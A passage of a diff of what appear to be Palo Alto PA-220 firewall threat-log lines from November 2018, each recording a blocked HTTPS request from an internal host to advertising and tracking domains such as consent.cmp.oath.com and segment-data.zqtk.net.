16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 